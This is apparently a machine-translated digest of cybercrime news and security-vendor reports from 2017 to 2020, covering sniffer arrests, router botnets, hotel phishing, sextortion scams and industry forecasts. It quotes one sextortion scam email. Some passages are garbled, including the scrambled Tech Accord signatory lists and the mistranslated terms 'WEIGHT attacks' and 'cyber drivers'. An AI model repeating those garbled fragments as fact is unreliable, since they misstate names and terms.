For the first time, the GetBilling sniffer family was described in Group-IB's Crime Without Punishment report in April 2019. JavaScript sniffers are a popular type of malicious code that is used in attacks on online stores to steal customers' personal and payment data: bank card numbers, names, addresses, logins, phone numbers and user data from payment systems. Threat Intelligence Group-IB has been tracking the GetBilling JS-sniffer family since 2018. An analysis of infrastructure controlled by Indonesia's arrested GetBilling operators found they managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America and several other countries.

In 2019, the team of the Group-IB investigation department managed to establish that part of the GetBilling infrastructure was deployed in Indonesia. INTERPOL's ASEAN Desk promptly informed Indonesia's cyber police. Despite the fact that the operators of the GetBilling sniffer tried to hide their location, for example, criminals always used to connect to the server to collect stolen data and control the sniffer, and only VPN hosting domains stolen cards were used to pay for services and purchases, Group-IB experts, together with local police officers, managed to collect evidence that the group works from Indonesia, and then go on the trail of the suspects themselves.

In today's digital world, cybercriminals are very quickly introducing advanced technologies in order to hide their illegal activities, and in order to steal large amounts of personal data for the purpose of financial enrichment. In order to ensure that law enforcement agencies have access to the information necessary to combat cybercrime, a strong and fruitful partnership between the police and information security experts is required . narrated by Craig Jones, Director of Cybercrime Investigation at INTERPOL

This case clearly demonstrates the international scope of cybercrime: JS sniffer operators lived in Indonesia, but attacked e-commerce resources around the world, which made it difficult to collect evidence, find victims and prosecute. However, international cooperation and data sharing can help effectively counteract current cyber threats. Thanks to the operational actions of the Indonesian cyber police and Interpol, Night Fury became the first successful international operation against JavaScript sniffer operators in the APAC region. This is an example of a coordinated cross-border fight against cybercrime. told Vesta Matveeva, Head of Information Security Incident Investigation at APAC Group-IB

During the search, the police seized laptops, mobile phones from various manufacturers, processors, identification cards and bank cards from the detainees. According to the investigation, the stolen payment data was used by the suspects to buy gadgets and luxury goods, which they then resold on Indonesian sites below market value. The suspects have already been charged with stealing electronic data - a crime punishable by up to ten years in prison under Indonesia's criminal code. The investigation is ongoing.

Sexual extortion through smart cameras

In mid-January 2020, researchers sounded the alarm over a wave of a new type of fraud - sexual extortion amid panic over the safety of smart cameras. Read more here.

2019

The number of attacks on the router has become tens of times more

Attacks on routers in 2019 became dozens of times more: if in January about 9-10 million attempts per month were recorded, then in December - already 250 million. This is evidenced by data from Trend Micro.

According to experts, hacking routers takes quite a short time, since many of these devices have well-known passwords by default. Attackers use a virus to infect the router, which, with a successful hacking attempt, will force it to automatically try to hack other users' routers.

Another reason for the growing number of attacks on such equipment is the competition between different groups of cybercriminals who try to compromise as many user routers as possible in order to connect them to their botnet networks.

In the future, botnets are sold on specialized resources in the form of a tool for carrying out DDoS attacks, or are offered as a tool for anonymizing various kinds of illegal actions, including data theft, capturing accounts or cheating clicks. It is noted that the competition in this segment is so serious that hackers remove any other people's malware that is found on hacked devices.

The authors of the study also indicate that in the context of the COVID-19 pandemic and the increase in the scale of remote work, this problem has become relevant.

To protect yourself from hacking, Trend Micro recommends following several tips:

• check the router log for suspicious activity, strange connections, and other anomalies;
• systematically update the firmware version on the router;
• use a complex and hard-to-guess password, while changing it from time to time;
• disable remote login, allowing you to connect to the router only from the local network.^[15]

27% of companies in the world faced cyber attacks on employees' smartphones

In 2019, 27% of companies in the world faced cyber attacks on employee smartphones, according to data from information security solutions developer Check Point Software Technologies.

Now we are witnesses to the epidemic of mobile advertising software - one of the most common forms of cyber threats aimed at collecting personal information from the user's device. Approximately 4 billion people access the Internet from a smartphone. However , companies rarely care about the security of employees' mobile devices, Check Point said.

The company notes that to steal corporate data and penetrate the organization's network, attackers only need to hack one mobile device belonging to an employee. Mobile threats are constantly being improved, and more and more fraudsters are using advertising malicious tools. They show advertising messages on a smartphone and are used by cybercriminals to carry out sixth-generation cyber attacks, Check Point noted.

 Experts cite the Agent Smith malware, which was discovered in 2019, as one example of the new mobile adware. Then Agent Smith infected about 25 million mobile devices around the world, while users did not even notice it. The program imitated the Google application and  exploited all known vulnerabilities in the Android system, automatically replacing installed applications with versions containing malicious code. Agent Smith also used device resources, displaying fake ads that could steal bank credentials and listen to conversations.

Information security specialists recommend downloading applications only from official directories, regularly updating the OS and software in smartphones, not allowing applications to work in the background and monitor access rights.^[16]

Hackers attack gas stations and steal motorists' bank data

In mid-December 2019 Visa , she warned customers that several hackers began attacking gas stations by injecting malware ON into corporate networks in order to steal the payment card data of motorists.

According to a Visa report, hackers moved away from the old method of stealing bank data, in which physical skimmers were installed at gas stations. Analysts have identified two incidents in which attackers injected malware into directly corporate merchant networks. By penetrating the IT infrastructure of retail chains, hackers gained access to vending machines containing unencrypted credit and debit card data. To spread viruses, hackers used companies' emails, sending letters from fake accounts.

Analysts at Visa noted that fuel outlets often neglect basic security technologies to protect card data, such as end-to-end encryption or tokenization. In addition, Visa's report notes that many gas stations still rely on magnetic stripe card readers rather than chip cards, raising the risk of hacking.

Any business that accepts, stores, processes and transfers payment card data must comply with PCI standards. However, a December 2019 Verizon survey of more than 300 organizations found that only 37% of them consistently ensure full compliance with all security requirements.

One proposed method of dealing with attackers is network segmentation. It not only requires hackers to be more skilled and time to penetrate the right part of the network, but also creates detection points where defenders can track the activity of an attacker.^[17]

The largest hacker group in history declassified

In early December 2019, the US Treasury Department named Evil Corp the largest hacker group in history and said it was based in Moscow. Read more here

Visitors steal credit card data

At the end of November 2019, it became known about a series of cyber attacks that hit hotels around the world. By their actions, hackers are trying to steal credit card data stored in the IT systems of the hotels themselves, as well as travel agencies.

The new malicious campaign, which affected at least 20 representatives of the hotel business in Brazil, Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey, reported in Kaspersky Lab.

To collect information from clipboards, devices for printing and screenshots of documents, attackers use Trojan remote administration programs, distributing them through malicious attachments in Word, Excel, PDF in phishing emails. Letters imitating official requests for group reservations from real people from real companies look very convincing, they include copies of official documents and detailed explanations of the reasons why this particular hotel was chosen. The only thing that gives out a fake is errors in writing the company's domain.

Attackers not only use remote access to infected computers themselves, but also sell it on illegal forums. The campaign involves several cyber groups, including RevengeHotels and ProCC.

According to the Bit.ly service, which was used to reduce the malicious link, it was distributed in many other countries, except for the ones listed above, which means that the amount of compromised data can be much larger.

Kaspersky Lab recommends that travelers use a virtual payment card to book a hotel through online travel agencies, and either a virtual wallet or a card with a limited amount of money in their account for local settlement.^[18]

Belarusian stole 630 thousand euros from banks and returned money with bitcoins

On November 12, 2019, the Investigative Committee of Belarus announced the investigation of a criminal case on embezzlement of funds from accounts of foreign banks. A 28-year-old resident of Grodno, involved in the crimes, was arrested with the assistance of the American FBI. Read more here.

Officials around the world attacked via WhatsApp

At the end of October 2019, it became known about a large-scale attack by hackers on high-ranking officials around the world through WhatsApp. Cybercriminals have exploited the messenger vulnerability to gain access to smartphones from more than 1.4 thousand users. Read more here.

Fortinet 2019 Operational Technology Security Trends Report

• In 2018, the number of attacks aimed at outdated OT system software increased significantly
• Cybercriminals take advantage of the lack of a standardized protocol for OT networks
• Attacks on OT systems do not differentiate by geography or industry
• 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus

After analyzing the 2018^[19], the researchers identified many IT-based attacks aimed primarily at industrial networks whose software has not been updated for a long time. On the other hand, such actions on IT systems are no longer effective. In addition, there has been an increase in the number of attacks directed at SCADA and ICS.

Such threats often target the most vulnerable parts of OT networks and exploit difficulties caused by the lack of standardization of protocols. It is also noteworthy that such attacks do not differentiate by geography or industry - in 2018 there was an increase in all directions and in all regions of the world.

Fortinet experts also identified an alarming trend in increasing the prevalence of exploits for almost every ICS/SCADA provider. In addition to attacks on non-updated OT systems, 85% of new threats were detected on devices with OPC Classic, BACnet and Modbus. In addition, cybercriminals also use to their advantage a wide range of OT protocols that do not have a single standard and differ depending on the functionality of the system, geography and industry. This makes it difficult to develop OT security solutions for vendors around the world.

In general, the study showed that the risks associated with IT/OT convergence are very real and should be taken seriously by any organization that has begun connecting its industrial systems to IT networks. Attackers will continue to use slower cycles of replacing and updating technology in enterprises. This trend is likely to continue over the years. The best way to counter new threats is to adopt and implement a comprehensive strategic approach that will simplify the operation of OT systems and involve all IT and OT experts in the organization.

The price of hacking

The costs of hacker attacks pay off immediately after the first theft, according to a study of the economy of hackers from Positive Technologies. The initial cost of a hacker attack on financial organizations will be about 45-55 thousand US dollars, experts reported in May 2019.

Approximately 2.5 thousand US dollars cost a monthly subscription to a service for creating documents with malware, tools for creating malicious files cost $300, the source code of the malware loader program - from $1.5 thousand, a program for exploiting vulnerabilities for implementation - about $10 thousand, legal tools that hackers can use, market experts estimated at 30-40 thousand dollars.

The smallest costs go to sending malware. So, according to the expert, they amount to about 1 thousand dollars per month.

Fraudster lured $123 million from Google and Facebook

At the end of March 2019, the US Department of Justice indicted a Lithuanian citizen who lured $123 million from Google and Facebook. A fraudster who pleaded guilty deceived American companies by compromising a corporate e-mail. Read more here.

Mass detentions of shadow Internet users

At the end of March 2019, it became known about the mass detentions of criminals who conducted their illegal activities on the shadow Internet. Read more here.

In the rooms of dozens of hotels built mini-cameras. You could spy on guests for $50 a month

In mid-March 2019, it became known that mini-cameras were installed in dozens of hotels in South Korea. The secret shooting of 1,600 unsuspecting tourists was broadcast live - you could spy on guests for $50 a month.

In general, 30 hotels in ten cities of the country were involved in the scandal; two offenders have already been arrested and two more are under investigation. The cameras were hidden in digital television boxes, wall sockets and hairdryer holders, and the footage was streamed online, the National Police Agency's Cyber Investigation Unit said in a statement. More than 4,000 participants were registered on the broadcast site, 97 of whom paid to access the cameras monthly. According to police, between November 2018 and March 2019, this service brought violators more than $6,000.

This is not the first time South Korea has faced such a situation: in 2012, more than 2,400 cases of illegal filming were registered in the police, in 2017 there are already more than 6,400 cases, and this figure is growing. In 2018, tens of thousands of women took to the streets of Seoul and other cities to protest such violations under the slogan "My life is not your porn!"

In response, Seoul has set up a special group of female inspectors who conduct regular inspections of about 20,000 of the city's public toilets to search for hidden cameras. However, critics condemn this step as a superficial measure. Nevertheless, police activity is not limited to this: in January 2019, the co-owner of the South Korean porn site was sentenced to four years in prison and pledged to pay a fine of $1.26 million. Soranet, which closed in 2018, was a popular site for uploading videos and photos taken with hidden cameras.^[20]

Fraudsters, posing as technical support for Microsoft, installed viruses

At the end of February 2019, the owner of Devine Technical Services, Baljinder Singh, was imprisoned, who, under the guise of technical support, Microsoft offered users to eliminate viruses from computers, but in fact installed malware to steal money. Read more here.

2018

Sex blackmail on the Internet is gaining popularity

In August 2018, it became known about the growing popularity of the method of extortion of money via the Internet. Cyber ​ ​ fraudsters blackmail users by telling their friends and relatives about watching porn.

Hackers send an email in which they attach the logins and passwords used by the victim, which were most likely leaked earlier. The authors of the message claim that they hacked the webcam and filmed a person watching pornographic videos and what they were doing at this time. Then the scammers demand a ransom in bitcoins so that they do not send out the video that they allegedly have.

In one of these letters, the following was written:

I know this is your password. We first recorded a video that you watched ( you taste good, haha) and then recorded from your webcam (yes, exactly where you do dirty business).

In this message, hackers demand to transfer $1,400 to a bitcoin wallet within 24 hours. As evidence, they express their willingness to send an intimate video to several friends.

Users who are afraid of a tarnished reputation agree to the demands of scammers.

On such a scheme, as the CEO of cybersecurity company Banreach Suman Kar told Motherboard, fraudsters were able to earn $500,000 with minimal effort using old passwords.

Banreach studied about 770 e-wallets that fraudsters indicated in reports of porn blackmail. Most (540) wallets were empty, but in 230 more than 1 thousand transactions were noticed for a total of 71 bitcoins.^[21]

Some attackers find victims on social networks and webcam chats, get acquainted with them on behalf of an attractive woman or man and involve the user in a frank conversation, the purpose of which is virtual sexual intercourse. As soon as the criminals manage to capture the victim on camera or get a screenshot of the intimate correspondence, they begin to blackmail her, threatening to publish video and photo materials in the public domain. 

Cybercriminals stole about $1.2 billion in cryptocurrency

Since the beginning of 2017, cybercriminals have stolen about $1.2 billion in cryptocurrency. Such data are contained in the report of the international non-profit organization Anti-Phishing Working Group (APWG). Excerpts from the study were published by Reuters on May 24, 2018.

In an interview with the agency, APWG Chairman Dave Jevans, who also heads CipherTrace, a cryptocurrency security company, said that stealing tokens by cybercriminals is a common problem, in addition to drug smuggling and money laundering using cryptocurrencies.

According to Dave Jevans, of the indicated amount of $1.2 billion, only about 20% or less were returned by law enforcement officers. According to him, law enforcement agencies around the world are busy tracking down attackers involved in the theft of digital money.^[22]

Another major incident related to cryptocurrency fraud became known in May 2018. Bloomberg reported on the investigation launched in the United States over alleged manipulations with the exchange rate of bitcoin and other cryptocurrencies.

The US Department of Justice is investigating whether traders resorted to illegal practices that affect quotes, such as spoofing. This term refers to the flooding of the market with fake applications in order to push other traders to buy or sell cryptocurrency.

The Ministry of Justice is cooperating in an investigation with the Commodity Futures Trading Commission (CFTC), which is the financial regulator of the bitcoin derivatives market.^[23]

Earlier, the Central Bank of the Russian Federation estimated the total damage from theft on the global cryptocurrency market since the beginning of 2018. According to Alisa Melnikova, head of the financial technology department of the Bank of Russia, at the Moscow Exchange Forum held on April 10, since the beginning of this year, 22 large fraudulent schemes have been committed in the world using digital financial assets and cryptocurrencies. As a result, the attackers stole about $1.36 billion in cryptocurrency, or $23 million a day. In January, more than $420 million was withdrawn from the Japanese CoinCheck exchange alone, Melnikova emphasized, referring to the statistics available to the Central Bank.^[24]

Cybersecurity Tech Accord

On April 17, 2018, 34 technology and security companies signed the cyber security Cybersecurity Tech Accord, an agreement between the largest group of companies in history committed to protecting customers around the world from malicious actions by cybercriminals. The 34 signatory companies included, Arm,,,,, Corp ABB.,,, and. Cisco Facebook HP HPE Microsoft Together, these Nokia Oracle Trend Micro enterprises represent the creators and users of technologies that ensure the operation of the global communication and information infrastructure.

• Increased protection - Enterprises will create a more powerful system of protection against cyber attacks. As part of this endeavor, the companies pledged to protect customers around the world regardless of the motives and targets of online attacks.
• Non-aggression - Companies will not assist governments in carrying out cyber attacks and will take measures to protect their products and services from hacking or malicious use at all stages of technological development and distribution.
• Capacity Building - Businesses will make additional efforts to support developers, companies, and private users of their technology, helping them expand their ability to self-protect. Such efforts may include the joint development of new practical security standards and new features that companies will be able to implement in their products and services.
• Collective Action - Companies will develop existing linkages and collaborate on new formal and informal partnerships with other industry, civil society and research communities to scale up technical cooperation, identify vulnerabilities, jointly analyze risks, and minimize the potential for malicious codes in cyberspace.

Despite the fact that many signatories complied with all these principles before the conclusion of the agreement, albeit without publicizing it, this agreement represents a public joint obligation to cooperate in cybersecurity issues. The technology agreement remains open to other signatories from the private sector, regardless of the scale or specialization of their activities, which enjoy a high reputation, strict cybersecurity standards and agree to unconditionally comply with the principles of the document.

The victims of cyber attacks are enterprises and organizations of all sizes, and the economic damage from such malicious actions by 2022 may reach $8 trillion. United States * Cumulative^[25] other risks, recent cyber attacks have led to the closure of small businesses, delays in vital surgical operations and disruptions in the provision of public services.

"The technology agreement will help protect the functional integrity of a trillion network devices that we predict will be operational over the next 20 years," said Carolyn Herzog, chief consultant at Arm. "The agreement brings together the resources, experience and strategic developments of the world's most important technology companies, creating a solid foundation for technology users who can derive the most extensive benefits from a more secure network environment."

Signatories of the Cybersecurity Technology Agreement:,,,,,,,,,,,,,, ABB Bitdefender Cisco ARM BT Cloudflare Avast! CA Technologies Stripe DataStax,, Dell,, HPE SAP DocuSign Intuit Fastly Facebook Juniper Networks Symantec,,,,,,,,,,,,,,,,,, LinkedIn Telefonica FireEye Microsoft Tenable F-Secure Nielsen Trend Micro GitHub Nokia VMware Guardtime Oracle HP Inc. RSA

Cybersecurity Tech Accord. This document is a public joint commitment of 34 international companies in the world, intending to protect and support civil society in an online environment, as well as to improve the security, stability and sustainability of cyberspace.

Microsoft Security Intelligence Report

Microsoft published information security the Security Intelligence Report in April 2018 for the period from February 2017. It is based on data obtained by the company's security programs and services (Data on the number of detected threats, and not on cases of infection). The information was provided by corporate and private users who agreed to share it with geolocation binding.

The report focuses on three topics: botnets, popular hacking methods and ransomware viruses. The purpose of the report's publication is to raise awareness among corporate and private users of existing threats and countermeasures.

The widespread use of botnets and ransomware viruses has led to the fact that the number of devices in Russia that faced cyber threats between February 2017 and January 2018 reached 25-30% on average per month, while the same figure in the first quarter of 2017 was almost half that - 15%. The highest rates were recorded in Pakistan, Nepal, Bangladesh and Ukraine (33.2% or higher), the lowest - in Finland, Denmark, Ireland and the United States (11.4% or lower).

According to Windows Defender Security Intelligence, Trojans have become the most common category of unwanted software. The percentage of their distribution from February 2017 to January 2018 increased from 6% to 10%. Indicators of other types of malware (droppers, obfuscators, ransomware viruses, etc.) amounted to less than 1%.

In 2017, methods of obtaining "easy prey," such as, phishing were used to obtain credentials and other sensitive information from users. According to Microsoft Advanced Threat Protection (ATP), phishing was among the most serious threats in Office 365 user mailboxes in the second half of 2017 (53%), 180-200 million phishing emails were detected monthly. In Russia, in particular, 7.01 (in the world - 5.85) phishing sites were discovered for every 1000 hosts. The next most common threats were loaders malware (29%) and - (11 Javabackdoors %).

Another target for attackers is low-security cloud applications. The study found that 79% of SaaS cloud storage applications and 86% of SaaS collaboration applications do not encrypt either stored or transmitted information. To protect the enterprise infrastructure, organizations must limit users' use of non-encryption cloud applications and control this with a Cloud Access Security Broker (CASB).

Another trend in the second half of 2017 is that cybercriminals use legitimate built-in system tools to distribute an infected document (for example, a Microsoft Office document) contained in a phishing email and download a ransomware program. The best way to avoid this type of threat is to update the operating system and software on time .

Cisco Annual Cybersecurity Report

Malware does not cease to improve: today attackers use cloud services and avoid detection with the help enciphering that helps to hide the activity of the flow of commands and control. According to the 11th report Cisco on (cyber security Cisco 2018 Annual Cybersecurity Report, ACRB ^[26]to reduce the time it takes ^[27] detect intruders, cybersecurity experts are beginning to increasingly use (and purchase) tools using (AI) artificial intelligence and machine self-learning (MS).

On the one hand, encryption helps to strengthen protection, on the other hand, the growth of both legitimate and malicious encrypted traffic (50% as of October 2017) multiplies the problems for those defending themselves in the process of identifying potential threats and monitoring their activity. Over the past 12 months, Cisco information security experts have recorded more than threefold growth in encrypted network traffic from inspected malware samples.

The use of machine self-learning helps to increase the efficiency of network protection and over time will automatically identify non-standard patterns in encrypted web traffic, cloud and IoT environments. Some of the 3,600 information security directors interviewed in the preparation of the Cisco 2018 Security Capabilities Benchmark Study report said they trust tools such as MS and AI and would like to use them, but they are disappointed by the large number of false positives. MS and AI technologies, which are now at the very beginning of their development, are being improved over time and will learn to determine the "normal" activity of the networks they monitor.

Some Cisco 2018 Annual Cybersecurity Report Results

Financial damage from attacks is increasingly real

• According to respondents, more than half of all attacks caused financial damage in excess of $500 million, including loss of income, customer outflow, lost profits and direct costs.

Supply chain attacks get harder and up to speed

• Such attacks can hit computers on a large scale, while their operation can last months and even years. You should be aware of the potential risks of using software and hardware from organizations that do not take information security issues seriously.
• In 2017, two similar attacks infected users with Nyetya and Ccleaner viruses through trusted software.
• To reduce the risk of an attack on the supply chain, third-party procedures must be reviewed to test the effectiveness of information security technologies.

Protecting is becoming more difficult, vulnerabilities are becoming more diverse To protect themselves, organizations use complex product combinations from various manufacturers. This complication, with an expanding variety of vulnerabilities, negatively affects the ability of organizations to repel an attack and, among other things, leads to an increase in the risks of financial losses.

• In 2017, 25% information security specialists reported that they were using products from 11 - 20 vendors, in 2016 the 18% answered.
• Information security experts reported that 32% vulnerabilities affected more than half of the systems, in 2016 the 15% answered this way.

Information security experts assessed the benefits of behavioral analysis tools to identify malicious objects

• 92% of specialists believe that behavioral analysis tools do a good job.
• 2/3 of the health sector and the financial services industry find behavioral analytics useful in identifying malicious objects.

Cloud usage is on the rise; attackers take advantage of the lack of advanced security tools

• This year, 27% of information security specialists reported using external private clouds (2016 figure - 20%).
• Of these, 57% place the network in the cloud for better data protection, 48% for scalability, 46% for ease of use.
• Although the cloud provides increased data security, attackers take advantage of the fact that organizations are not very good at protecting developing and expanding cloud configurations. The security efficiency of such configurations is enhanced by a combination of best practices, advanced security technologies such as machine self-learning, and first-line security tools such as cloud-based information security platforms.

Malware growth trends and detection times

• The time to detection (TTD) demonstrated by Cisco between November 2016 and October 2017 was about 4.6 hours. In November 2015, this figure was 39 hours, and according to the Cisco Cybersecurity Report for 2017, the median detection time for the period from November 2015 to October 2016 was 14 hours.
• Cloud-based information security technologies have become a key factor for Cisco in reducing discovery time and keeping it low. The shorter the detection time, the faster the attack is reflected.

Additional recommendations for information security departments:

• Control compliance with corporate policies and practices to update applications, systems, and devices
• Timely receipt of accurate threat data and the availability of processes to use this data for security monitoring
• In-depth and advanced analysis;
• Regular backup and review of recovery procedures - critical actions in the face of rapid evolution of network ransomware and disruptive malware
• Perform security checks on microservices, cloud services, and application administration systems.

Indictment of members of the Infraud group

On February 7, 2018, the US Department of Justice announced the indictment of 36 persons belonging to the cybercriminal  group Infraud, whose activities damaged consumers, businesses and financial institutions in the amount of more than $530 million. At the same time, hackers intended to steal more than $2.2 billion. Read more here.

Internet faces fragmentation due to cyber attacks

As a result of cross-border cyber attacks, the Internet can break up into separate national and regional sites. This was reported in the report "Global Risks - 2018," presented at the World Economic Forum (WEF) in Geneva.

Fragmentation of the Global Network can lead to the termination of its functions and a slowdown in technological progress. Internet The development of the sphere will help to prevent division into parts. cyber security According to the authors of the report, a dialogue between governments and technology companies will play a great importance in this.

According to the report, there is now more emphasis on developing offensive rather than defensive capabilities in cyberspace. Because of this, there is a "fog of uncertainty in which the potential for incorrect calculations can cause a spiral of retaliatory punitive measures," the TASS news agency Russian News Agency quotes an excerpt from the report. In turn, the adoption of responses can cause a chain reaction, the authors note.

There is a possibility that the real source of the cyber attack will be determined incorrectly and a retaliatory strike will be inflicted on an innocent target. Then the goal will also strike back, and the circle of parties involved in the conflict will expand. As a result of attacks on incorrect targets, physical rather than cyber weapons can even be used.

Currently, the use of conventional weapons is regulated from the legal side, and it is necessary to develop similar norms in relation to the conduct of cyber war, the authors of the report are sure. With such norms, entire classes of cyber weapons could be banned, as is done with chemical and biological weapons.

The clinic paid $55 thousand to cyber drivers

In early January 2018, the Hancock Health clinic in the American city of Greenfield, Indiana, was subjected to a hacker attack using the SamSam ransomware virus, which paralyzed the operation of a medical facility at the height of the flu epidemic in the state. To quickly recover the data, the hospital management paid ransomware ransoms in the amount of 4 bitcoins, which at the time of payment amounted to about $55 thousand. Read more here.

2017

Trends from PandaLabs

• More than half of the attacks stem from a desire to profit financially from them, while espionage has become the second main motivating factor.
• Hidden attacks with adaptive horizontal movements are becoming very common.
• Attackers have increasingly begun to carry out attacks without using malware. They prefer to go unnoticed by traditional defense models without requiring victim interaction. With optimal execution, such attacks can double the profits.
• Tools to exploit vulnerabilities have spawned new attack vectors that also do not require interaction with the victim.
• The goal is the end devices. The perimeter has become blurred, mobility is the norm for almost any company, and therefore corporate networks have become more and more vulnerable.
• Former employees of enterprises are trying to blackmail their previous employers by initiating attacks from within companies.
• Also in 2017, we saw an increasing presence of organized cyber crime groups such as the Lazarus Group, attacking media, aerospace and financial sectors, and critical infrastructure in the United States and elsewhere in the world.
• Cyber wars and cyber armies: There is a full-scale arms race in cyber space, and many states are setting up command cyber centers to increase the level of protection against attacks targeting their companies and infrastructures.

Year results and forecasts from Positive Technologies

The past year, according to Positive Technologies experts, was remembered for the following events and trends:

• Ransomware viruses. The lack of current updates and the habit of living with vulnerabilities led to the shutdown of Renault factories in France, Honda and Nissan in Japan; banks, schools, energy, telecommunications companies were affected.
• Practical safety. Paper security began to be fought at the highest level. Federal Law N 187-FZ "On the Security of the Critical Information Infrastructure of the Russian Federation" not only recommends, but obliges state and commercial companies to protect themselves and introduces mechanisms to control the effectiveness of protective measures.
• Telecom vulnerabilities began to be exploited. Attackers began to intercept codes for two-factor authentications using signal protocol vulnerabilities. SS7 O2-Telefonica subscribers were the first to suffer.
• "Scalable" attacks on ATMs. ATMs have been robbed for a long time and in various ways, for example, they are tied to a car cable and taken away. But when cybercriminals began to connect to the bank's local network and remotely monitor many ATMs, banks had a serious cause for concern.
• Covert mining. In the spring of 2017, our experts discovered hundreds of computers in large companies that mined cryptocurrency for unknown crackers. Miner exploited the same vulnerability as WannaCry and protected captured PCs from the ransomware.
• Sign in via IoT. No sooner had the noise around IoT security subsided due to botnets and DDoS attacks, as petrochemical plants began to be stopped with the help of unprotected "smart" coffee machines, and smart aquariums were used to attack casinos.
• Bitcoins and vulnerable web. By the end of the year, Bitcoin was ahead of the Russian ruble in terms of capitalization, and hackers focused on blockchain startups. The simplest attack scheme is to find vulnerabilities on the ICO website and replace the address of the wallet to collect investments. Israeli CoinDash thus lost $7.5 million.
• Epidemic of targeted attacks. The number of companies facing APT attacks in 2017 has almost doubled. At the same time, attacks are becoming more complicated right before our eyes, methods are being actively used that make it difficult to analyze and investigate incidents.

Among the forecasts for 2018, Positive Technologies experts note the following:

• The response to the complication of the attacks was the growing interest in building security monitoring centers (SOCs). This year alone, about 10 companies have begun to create their SOCs in some form. In 2018, the number of SOCs will triple.
• The State system of detection, prevention and elimination of consequences of computer attacks system and the requirements of the N 187-FZ law do not guarantee that the system cannot be hacked, but the fulfillment of these requirements and the creation of State system of detection, prevention and elimination of consequences of computer attacks centers will cut off 90% of primitive attacks, allowing you to concentrate on high-level ones.
• The growth of logical attacks on ATMs will continue (in the first half of 2017 alone, the total volume of attacks of this type in European countries increased by 500%). Banks, in turn, will become even more interested in real threats that threaten financial losses and assess risks.
• Mobile network vulnerabilities can cost lives. Using mobile networks, self-driving cars exchange data on speed, location of cars on the track and other data. DDoS attacks can leave such a car literally without "feelings and eyes." Another example is smart traffic lights connected to mobile networks. As part of the working groups, our experts drew the attention of mobile operators to the insecurity of the Diameter protocol. Thanks to this, operators decided to abandon the Diameter protocol in the next generation 5G networks and replace it with an alternative option.
• The attention of attackers will be directed to web wallets - although it is convenient, but unsafe, sooner or later they will be hacked. We also predict an increase in the number of hacks of web applications of blockchain projects through phishing.
• Hardware attacks, such as exploiting a vulnerability in the Intel Management Engine, are awaiting rennesance. If attackers manage to use them, targeted attacks, as well as cryptolocker attacks, will go to another level when not only data is blocked, but the motherboard also breaks.

Trend Micro Forecasts

Trend Micro published in December 2017 an annual report with forecasts for information security for 2018, "Paradigm Shifts: Trend Micro Security Predictions for 2018^[28] According to forecasts, the use of known vulnerabilities in attacks will increase as a result of the growth of the attacked surface of modern enterprises, which opens up more and more security holes. To protect the organization's most valuable data, management must change priorities in favor of patch management and employee training.

According to the report, according to Trend Micro forecasts for 2018, in the process of merging information (IT) and operating (OT) technologies, enterprise applications and platforms are at risk of manipulation and vulnerabilities. In addition, Trend Micro predicts an increase in Internet of Things (IoT) vulnerabilities as more devices are manufactured without regard to security rules and industry standards. In general, the growth of network connectivity and the increased attack surface create new opportunities for cybercriminals who use known security flaws to penetrate the corporate network.

Ransomware will remain a key component of the cyber threat landscape, as it has proven successful. The company will observe an increase in directed ransomware attacks, in which individual enterprises will be at risk, after which managers will be forced to pay a larger ransom. Compromise of corporate e-mail (WEIGHT attacks) will also gain popularity among cybercriminals, since the payback in the event of a successful attack is very high.

Cybercriminals will also use increasingly influential technologies - blockchain and machine learning - to mask their activities from traditional methods of protecting information. For this reason, Trend Micro recommends a layered strategy using multi-generational security technologies that combines advanced security tools backed by nearly 30 years of company experience in protecting the world's largest brands.

The main conclusions are:

• According to experts, global losses from weight attacks in 2018 will exceed $9 billion.
• Cybercriminals will start using machine learning and blockchain technologies in their hacking techniques. DAO (Decentralized Autonomous Organization), the first decentralized venture capital fund built on the basis of the Ethereum blockchain, was subjected to a major large-scale attack. As a result of the exploitation of an error in the DAO code, more than $50 million of electronic cash disappeared from the project accounts
• In 2018, ransomware will remain the main tool for making a profit, although other types of cybercrime will gain momentum
• In 2018, cybercriminals will find new ways to exploit gaps in IoT-class devices for their own benefit. In addition to DDoS attacks, attackers will use IoT devices to create proxy servers in order to hide their real location and web traffic. The reason for this trend is that when conducting investigations, the police most often rely on the IP address in the logs. More and more devices such as biometric trackers, drones, audio speakers and voice assistants will be hacked to extract accumulated data, enter homes, etc.
• Enterprise applications and platforms will be at risk of misuse and vulnerabilities. SAP and other enterprise resource planning systems can be compromised. If the data being processed has been modified or an incorrect command sent in the ERP system, computing can become a sabotage tool, leading to erroneous decisions such as incorrect resource amounts, unwanted money transfers, and even overloading systems
• Cyber ​ ​ propaganda campaigns will become more refined thanks to the use of already tested spam mailing methods
• Most companies will begin to comply with the rules of the European law on the protection of personal data of the act (General Data Protection Regulation, GDPR) only after the first high-profile lawsuit

US intelligence agencies: Islamic State "gone" to the virtual world

The terrorist organization Islamic State (IS) after the defeat in Syria settled in cyberspace. This assumption was put forward by representatives of the US intelligence services in early December 2017.

IS's ability to contact people sympathetic to them through social networks is unprecedented and gives the organization a chance to reach a large number of extremists within different countries, "said Laura Shayo, head of intelligence at the US National Counterterrorism Center.

Thus, according to representatives of the special services, terrorists will continue to promote their ideology through the Internet.

Ron Johnson, a spokesman for the National Security and State Affairs Committee, also believes that the "new caliphate" is now located in cyberspace.^[29]

PwC: Russian companies caught up with American in terms of cybersecurity

cyber security 60% of Russian companies have a strategy for. Thus, in this area Russia , it bypassed (Germany 45%), France (51%), Italy (55%) and caught up with (USA also 60%). This was reported by Izvestia with reference to the report of a consulting company PricewaterhouseCoopers ^[30] with^[31] in^[32]

The most cyberattack-proof countries are Malaysia (74%), Japan (72%) and Indonesia (70%), according to the report. The main difference between Russian companies and foreign ones is that not all of them choose and use international cybersecurity standards in practice and, as a result, certain aspects of protection against cyber threats are often missed. At the same time, abroad, these standards are often mandatory.

According to the report, the most serious cyber threats in Russian companies are considered a violation of data privacy (48%), a violation of the normal course of the company's activities (47%), a decrease in product quality (27%) and the creation of a threat to life (21%).

As noted in the report, most employees of the surveyed Russian companies called phishing attacks the main causes of cyber incidents. In second place was the use of mobile devices - more than a quarter of respondents indicated this problem.

As experts noted, the public sector spends the most funds on protection against cyber threats. Government agencies purchase large volumes of software and hardware protection tools and implement large IT projects. At the same time, banks are leading in this issue in terms of the effectiveness of protection against cyber incidents.

